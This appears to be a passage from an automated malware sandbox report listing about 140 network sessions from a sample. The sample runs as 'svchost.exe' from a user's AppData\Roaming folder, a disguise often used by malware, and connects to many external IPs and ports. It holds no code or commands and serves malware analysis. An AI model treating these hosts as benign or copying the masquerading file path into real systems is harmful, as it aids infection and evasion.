                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3838192.168.2.56195064.227.108.253190856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3839192.168.2.561899101.51.121.29415356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3840192.168.2.562196190.128.228.1828056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3841192.168.2.562267157.185.157.1512658956176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3842192.168.2.56227194.131.63.44312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3843192.168.2.562270172.245.159.1778056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3844192.168.2.562235194.34.232.1078056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3845192.168.2.562293104.18.234.2188056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3846192.168.2.56224513.37.59.99312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3847192.168.2.561971157.245.255.29564356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3848192.168.2.56225046.17.63.166909156176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3849192.168.2.562244211.222.252.187819356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3850192.168.2.561842103.88.57.2033265056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3851192.168.2.56220045.138.87.238108056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3852192.168.2.562258136.244.99.51888843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3853192.168.2.56226846.17.63.1661637956176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3854192.168.2.56205172.167.222.113412556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3855192.168.2.562254193.239.58.92808156176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3856192.168.2.562253120.76.42.209888856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3857192.168.2.562259123.126.158.508056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3858192.168.2.559555162.214.227.685679643312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3859192.168.2.56227994.23.220.1364076756176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3860192.168.2.5621955.10.249.159108043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3861192.168.2.559436159.223.71.714992243312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3862192.168.2.56224690.188.250.168056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3863192.168.2.56201651.89.173.40310056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3864192.168.2.5623048.219.177.1341567356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3865192.168.2.562329142.4.123.418056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3866192.168.2.560988171.250.222.13108043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3867192.168.2.562024139.224.64.191808143312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3868192.168.2.559574148.72.209.1743808843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3869192.168.2.55953784.254.0.863265043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3870192.168.2.562319167.71.5.83808043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3871192.168.2.56200491.134.140.1602720756176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3872192.168.2.56236593.190.24.11944356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3873192.168.2.56236693.190.24.11944356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3874192.168.2.56236893.190.24.11944356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3875192.168.2.56236993.190.24.11944356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3876192.168.2.56233146.17.63.166948056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3877192.168.2.562328119.196.168.1838056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3878192.168.2.55964667.227.186.835637043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3879192.168.2.56233043.131.248.1651567356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3880192.168.2.56223036.134.91.82888856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3881192.168.2.562341121.159.146.2518056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3882192.168.2.559709162.214.225.2235824043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3883192.168.2.55971492.204.136.1491862943312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3884192.168.2.559664154.16.116.166251243312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3885192.168.2.562344120.48.62.239808056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3886192.168.2.56233943.155.130.1821567356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3887192.168.2.559649103.186.8.162808043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3888192.168.2.562362157.185.157.1512658956176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3889192.168.2.562358185.158.114.142569756176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3890192.168.2.5623643.9.71.167312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3891192.168.2.56197772.195.114.169414556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3892192.168.2.561595184.170.245.148414556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3893192.168.2.562359103.23.100.1414556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3894192.168.2.562384104.129.199.57880056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3895192.168.2.562115163.15.183.33312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3896192.168.2.56239043.157.44.7944356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3897192.168.2.56240543.157.50.20644356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3898192.168.2.56241043.157.44.7944356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3899192.168.2.56241143.157.44.7944356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3900192.168.2.56241343.157.44.7944356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3901192.168.2.56237434.95.243.122808156176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3902192.168.2.56237546.17.63.166909156176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3903192.168.2.56237646.17.63.1661637956176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3904192.168.2.560355199.102.105.242414543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3905192.168.2.562380123.126.158.508056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3906192.168.2.56237845.138.87.238108056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3907192.168.2.562082184.170.248.5414556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3908192.168.2.562409142.4.123.418056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3909192.168.2.562382120.76.42.209888856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3910192.168.2.56219712.186.205.1238056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3911192.168.2.56216313.81.217.2018056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3912192.168.2.562395154.12.178.1072998556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3913192.168.2.56241592.204.134.382582556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3914192.168.2.559896209.126.104.383936943312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3915192.168.2.559911107.180.90.886290843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3916192.168.2.56229864.227.108.253190843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3917192.168.2.560261153.139.233.218808043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3918192.168.2.562431198.199.86.11312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3919192.168.2.5624078.219.177.1341567356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3920192.168.2.562458172.67.181.128056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3921192.168.2.562391103.127.1.1308056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3922192.168.2.562453157.185.157.1512658956176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3923192.168.2.562462104.16.108.2048056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3924192.168.2.56219945.120.178.197108056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3925192.168.2.562428161.97.173.425394856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3926192.168.2.56245112.11.59.114108056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3927192.168.2.56247345.144.30.23244356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3928192.168.2.56247445.144.30.23244356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3929192.168.2.56247645.144.30.23244356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3930192.168.2.56247745.144.30.23244356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3931192.168.2.562460162.243.102.207976456176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3932192.168.2.56244646.17.63.166948056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3933192.168.2.56249443.157.32.23044356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3934192.168.2.562445119.196.168.1838056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3935192.168.2.56243651.161.131.842584356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3936192.168.2.56223772.167.221.1455033556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3937192.168.2.55992191.134.140.160257243312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3938192.168.2.559912212.33.205.42811843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3939192.168.2.56241690.188.250.168056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3940192.168.2.56246950.63.12.334513456176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3941192.168.2.562252161.97.173.426228956176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3942192.168.2.56221692.205.110.471493656176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3943192.168.2.562491104.17.16.878056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3944192.168.2.56250045.12.31.1408056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3945192.168.2.562502104.22.14.488056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3946192.168.2.562447104.17.248.1648056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3947192.168.2.562507104.16.224.338056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3948192.168.2.562465199.102.105.242414543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3949192.168.2.561518162.241.158.2045298056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3950192.168.2.562466184.170.245.148414556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3951192.168.2.562521172.67.182.1078056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3952192.168.2.562528172.67.200.2208056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3953192.168.2.562536104.17.66.698056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3954192.168.2.562539104.18.237.1288056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3955192.168.2.562538104.21.85.2008056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3956192.168.2.56248660.246.122.2448056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3957192.168.2.56247047.243.205.1312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3958192.168.2.56250646.17.63.1661637956176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3959192.168.2.562467103.23.100.1414556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3960192.168.2.56249754.233.119.172312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3961192.168.2.56250982.165.105.488056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3962192.168.2.561555165.227.196.376363756176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3963192.168.2.562565104.20.179.1878056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3964192.168.2.562573172.67.187.2428056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3965192.168.2.562576104.16.241.2048056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3966192.168.2.56249688.210.20.1442000056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3967192.168.2.56248149.228.131.169500056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3968192.168.2.562518147.75.34.861001056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3969192.168.2.562582142.4.123.418056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3970192.168.2.562515116.203.28.438056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3971192.168.2.56252943.131.242.1621567356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3972192.168.2.562583157.185.157.1512658956176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3973192.168.2.562598162.243.102.207976456176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3974192.168.2.56234945.81.232.172730856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3975192.168.2.56253220.24.43.2148056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3976192.168.2.56256189.38.99.292055156176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3977192.168.2.561636148.72.206.84253656176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


